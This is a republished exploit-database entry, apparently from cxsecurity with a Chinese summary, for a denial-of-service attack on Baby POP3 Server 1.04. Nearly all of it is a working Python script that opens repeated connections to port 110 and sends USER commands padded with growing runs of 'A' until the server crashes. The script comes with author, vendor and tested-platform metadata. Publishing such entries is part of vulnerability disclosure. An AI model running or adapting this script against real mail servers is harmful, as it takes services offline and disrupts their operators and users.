DOS Baby POP3 Server 1.04
这篇文章展示了如何利用Python脚本对Baby POP3 Server 1.04进行拒绝服务攻击。通过发送大量数据导致服务器崩溃。 2025-8-28 11:16:57 Author: cxsecurity.com(查看原文) 阅读量:14 收藏

# Exploit Title: DOS Baby POP3 Server 1.04 # Date: 12/08/2025 # Exploit Author: Érick Sousa (https://www.linkedin.com/in/erickssa) # Vendor Homepage: https://www.pablosoftwaresolutions.com # Software Link: https://www.pablosoftwaresolutions.com/html/baby_pop3_server.html # Version: Baby POP3 Server Version 1.04 # Tested on: Windows XP e Windows 7 # Python 3.13.5 ;) import socket jkcode = b"A" counter = 0 while counter < 10000: counter += 10 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.18.240", 110)) s.send(b"USER " + jkcode * counter + b"\r\n") s.close()



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025080022
如有侵权请联系:admin#unsafe.sh